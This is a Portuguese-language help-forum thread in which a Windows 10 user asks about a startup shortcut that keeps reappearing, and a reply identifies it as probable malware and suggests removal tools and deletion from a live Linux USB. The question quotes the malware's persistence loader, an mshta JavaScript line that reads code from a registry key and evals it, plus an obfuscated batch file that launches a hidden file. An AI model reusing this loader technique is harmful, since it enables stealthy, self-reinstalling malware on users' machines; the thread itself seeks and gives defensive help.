Windows 10, o que é este atalho na pasta de inicialização?

2

Existe um atalho na pasta de inicialização com isso como a linha de comando que executa. Eu deletei o atalho e ele só reaparece em segundos. Renomeie e um novo reaparece em segundos.

C:\Windows\System32\cmd.exe /C start "" mshta.exe "javascript:P4jMDuRB="Sm3jr6aQ";c40B=new ActiveXObject("WScript.Shell");QS2K8wl="cDy";nv5R4S=c40B.RegRead("HKCU\software\voxpbs\semhdvkm");g2McQ8A="Ns6iJl";eval(nv5R4S);JldeI3="1UbkKa";"

Também encontrei um arquivo de lote na pasta users \ me \ local. Os comandos que executa são:

echo J9pmT5Q
echo B0NWNWENzjH21WwgEa2kO0
echo 5Wjb2iki6K0a
echo FrG1NkCWmPPz57pvX
echo vxh8uiEY4zed9rLWqlq3INKnP
echo ZJ882016HVGsX28HEC53bkelC
echo x4SZRj8VY37HCvczeQ9
start "QevslvDchtWcI59vUY1" "%LOCALAPPDATA%d9b5f.3f751"
echo rDqX4A1lWPV1YBTn47sCq
echo US6k8ZpwRaBaZ8WjjuIWQoHhqnYhPf3U
echo VHu5IVd8Y0oGQx0qB0UJaQhjf
echo Q98kbBFD2PgR
echo uEyyzwkL88oeKhG1d3U3ds
echo lpM0oIMjeZ2IA5w9GGWaXzhx3PGmfoO
echo YJrUdLTH

Eu vejo isso sendo executado quando o computador é inicializado. É chamado por um nome de atalho "d178". Eu vejo a janela de comando por um curto período de tempo durante o processo de inicialização. Eu escaneei o arquivo "505f.3f751", não há infecções até o momento.

Se alguém tiver alguma ideia sobre o que é isso, seria legal. Eu não tentei uma inicialização no modo de segurança ainda para ver o que acontece depois. Eu provavelmente vou em breve.

    
por montejw360 17.12.2016 / 03:38

1 resposta

0

Isso é mais provável que seja algum tipo de malware, adware ou outro PUP.

Portanto, devemos tentar removê-lo. Eu vejo que você tentou removê-lo com o regedit. Eu sugiro que você tente AdwCleaner como foi sugerido e também Malwarebytes .

Se você ainda não consegue removê-lo, então este programa provavelmente está rodando e copiando quando detecta que ele foi excluído. Portanto, sugiro que tentemos removê-lo enquanto externo ao sistema operacional. Faça o download de qualquer distribuição Linux ao vivo, como este , e uma ferramenta chamada Rufus . Use Rufus para colocar o ISO em um pen drive. Inicialize a unidade flash e tente remover o arquivo. Espero que, quando você reiniciar, ele tenha ido embora.

    
por 18.12.2016 / 13:15